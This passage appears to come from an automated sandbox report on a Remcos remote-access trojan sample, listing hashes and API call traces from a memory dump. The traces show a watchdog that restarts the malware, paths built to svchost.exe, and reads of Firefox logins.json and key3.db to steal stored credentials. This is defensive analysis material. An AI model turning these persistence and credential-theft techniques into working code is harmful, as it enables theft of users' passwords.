                                        • Opcode ID: 85389655ccf312e74c41d41a43fd4d1fbb1ccf973644e7ce17a1e4acb925192c
                                        • Instruction ID: aaec609cd6a5438bb82df53de8e824b0c91ee93dfa3372403453e0fac8186511
                                        • Opcode Fuzzy Hash: 85389655ccf312e74c41d41a43fd4d1fbb1ccf973644e7ce17a1e4acb925192c
                                        • Instruction Fuzzy Hash: 4AC08C3149431C6DEA02A3B5990BBE5776CD35EB44F4002BAAA11830D7D384955D42B6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        APIs
                                        • GetCurrentProcessId.KERNEL32 ref: 0040A5FE
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,00000000), ref: 0040A611
                                          • Part of subcall function 0040B829: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B836
                                          • Part of subcall function 0040B829: RegSetValueExA.ADVAPI32(?,00000004,00000000,00000004,?,00000004,00000000,?,00409CDD,80000001,00000000), ref: 0040B851
                                          • Part of subcall function 0040B829: RegCloseKey.ADVAPI32(?,?,00409CDD,80000001,00000000), ref: 0040B85C
                                        • OpenMutexA.KERNEL32 ref: 0040A63B
                                        • CloseHandle.KERNEL32(00000000), ref: 0040A64A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Remcos restarted by watchdog!,?), ref: 0040A65E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 0040A68C
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A69C
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,?), ref: 0040A6B6
                                          • Part of subcall function 0040B4C8: RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                          • Part of subcall function 0040B4C8: RegQueryValueExA.KERNELBASE(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                          • Part of subcall function 0040B4C8: RegCloseKey.KERNELBASE(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 0040A6D4
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH), ref: 0040A6E2
                                          • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                          • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                          • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                          • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                          • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                          • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                          • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                          • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                          • Part of subcall function 0040A8CE: OpenProcess.KERNEL32(00100000,00000000,?,80000001,?,0040A86F), ref: 0040A8DC
                                          • Part of subcall function 0040A8CE: WaitForSingleObject.KERNEL32(00000000,000000FF,?,0040A86F), ref: 0040A8E7
                                          • Part of subcall function 0040A8CE: CloseHandle.KERNEL32(00000000,?,0040A86F), ref: 0040A8EE
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?), ref: 0040A7A3
                                        • _wgetenv.MSVCRT ref: 0040A7B3
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040A7BE
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A7C9
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A7D5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7DE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7E7
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog launch failed!,?), ref: 0040A882
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?), ref: 0040A896
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A673
                                          • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                          • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                          • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A709
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040A718
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 0040A72D
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?), ref: 0040A748
                                        • _wgetenv.MSVCRT ref: 0040A758
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040A763
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A76E
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A77A
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A783
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A78C
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7F0
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(\svchost.exe), ref: 0040A7FE
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041BD70), ref: 0040A80C
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040A816
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 0040A837
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A84B
                                        • Sleep.KERNEL32(000007D0), ref: 0040A85E
                                        • CloseHandle.KERNEL32 ref: 0040A8AA
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8B6
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8BF
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[INFO]$\SysWOW64$\svchost.exe$\system32

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00410595
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6F5E5DF0), ref: 004105AD
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(Function_0001B310), ref: 004105BE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004105CD
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00415A24,00000000,00000001), ref: 00410617
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,00000001), ref: 00410624
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 0041062F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 0041063B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 00410648
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 00410655
                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,?,?,?,00000000,00000001), ref: 00410679
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,00000000,00000001), ref: 0041068B
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 00410694
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 004106A9
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 004106B3
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                          • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                          • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000,?,?,?,00000000,00000001), ref: 004106D0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004106DC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,Function_0001B310,00000000,00000000,Function_0001B310,00000000,00000002,Function_0001B310,?), ref: 00410713
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,Function_0001B310,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00410720
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Function_0001B310,?), ref: 00410730
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Function_0001B310,?), ref: 00410740
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,Function_0001B310,?), ref: 00410750
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_0001B310), ref: 0041075A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000005E), ref: 00410774
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410780
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041078C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410795
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041079E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004107A7
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004107B0
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004107C2
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00416A54), ref: 004107D6
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 004107E8
                                        • FindFirstFileW.KERNEL32(00000000), ref: 004107EF
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415898), ref: 00410817
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 00410824
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410830
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 00410850
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0041085A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410866
                                        • FindNextFileW.KERNEL32(?,?), ref: 0041087C
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415A28), ref: 00410898
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 0041089F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004108AB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 004108CB
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004108D5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004108E1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004108FC
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000005D), ref: 00410911
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041091A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041092B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410934
                                          • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                          • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                          • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                          • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                          • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 004072A1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004072AE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004072BB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 004072CD
                                        • getenv.MSVCRT ref: 004072D9
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 004072E5
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004072F1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004072FA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407303
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00415BC8,?), ref: 0040731D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 00407327
                                        • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 0040732E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 0040733A
                                        • FindClose.KERNEL32(000000FF,?,?,?), ref: 00407348
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox StoredLogins not found],00000000), ref: 0040735C
                                          • Part of subcall function 00407A90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000,?,004078A9), ref: 00407A9E
                                          • Part of subcall function 00407A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,004078A9), ref: 00407AB1
                                        • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 0040737F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\logins.json,?,?,?), ref: 0040741E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\logins.json,?,?,?), ref: 0040742B
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\logins.json,?,?,?), ref: 00407437
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?), ref: 00407440
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?), ref: 00407449
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407463
